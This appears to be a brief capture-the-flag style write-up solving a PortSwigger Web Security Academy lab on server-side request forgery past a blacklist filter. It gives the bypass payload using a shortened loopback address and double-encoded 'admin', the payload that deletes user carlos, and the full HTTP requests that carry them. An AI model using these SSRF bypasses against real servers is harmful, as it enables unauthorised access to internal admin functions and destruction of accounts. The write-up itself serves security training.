Port Swigger SSRF with blacklist based input filte
Solution
Open the website: https://0a0f003a0497d9e88310d2a1009100e5.web-security-academy.net/product?productId=1
https://0a0f003a0497d9e88310d2a1009100e5.web-security-academy.net/product?productId=1
Payload: http://127.0.1/%2561dmin
---
POST /product/stock HTTP/2
Host: 0ab4009203bbc66981d1c50a002e0017.web-security-academy.net
Cookie: session=bdFNqipkmA8glbEnjLh654pNIuYXgrSz
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab4009203bbc66981d1c50a002e0017.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: https://0ab4009203bbc66981d1c50a002e0017.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
stockApi=http://127.0.1/%2561dmin
Delete user: carlos
Payload: http://127.0.1/%2561dmin/delete?username=carlos
---
POST /product/stock HTTP/2
Host: 0ab4009203bbc66981d1c50a002e0017.web-security-academy.net
Cookie: session=bdFNqipkmA8glbEnjLh654pNIuYXgrSz
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab4009203bbc66981d1c50a002e0017.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: https://0ab4009203bbc66981d1c50a002e0017.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
stockApi=http://127.0.1/%2561dmin/delete?username=carlos
Solved